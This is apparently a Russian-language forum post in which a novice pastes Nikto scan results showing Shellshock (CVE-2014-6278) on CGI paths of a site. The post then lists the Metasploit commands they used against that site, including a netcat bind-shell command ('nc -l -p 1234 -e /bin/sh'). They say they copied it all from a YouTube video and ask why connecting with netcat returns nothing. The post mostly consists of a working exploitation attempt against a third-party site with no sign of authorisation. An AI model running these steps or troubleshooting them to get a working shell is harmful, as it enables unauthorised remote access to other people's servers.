Server banner has changed from 'Apache' to 'AkamaiGHost' which may suggest a WAF, load balancer or proxy is in place + OSVDB-112004: /cgi-bin/admin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /cgi-bin/administrator.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /cgi-bin/authLogin.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /cgi-bin/bb-hist.sh: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). Открываю Метасплойт.... пишу туда: search 2014-6278 нашел 3 експлойта, вел дальше так set auxiliary/scanner/http/apache_mod_cgi_bash_env set CMD /usr/bin/nc -l -p 1234 -e /bin/sh зачем не знаю, увидел точно такую же в видео в Ютубе и сделал так же... Сылка на видео в конце будет дальше set RHOSTS 0.0.0.0 (сайт) set TARGETURI /cgi-bin/administrator.cgi exploit пишет что прошел потом открываю консоль пишу: nc 0.0.0.0 1234 и там не чего не выдает кароче..... делал по этому видео Кому не лень подскажите че к чему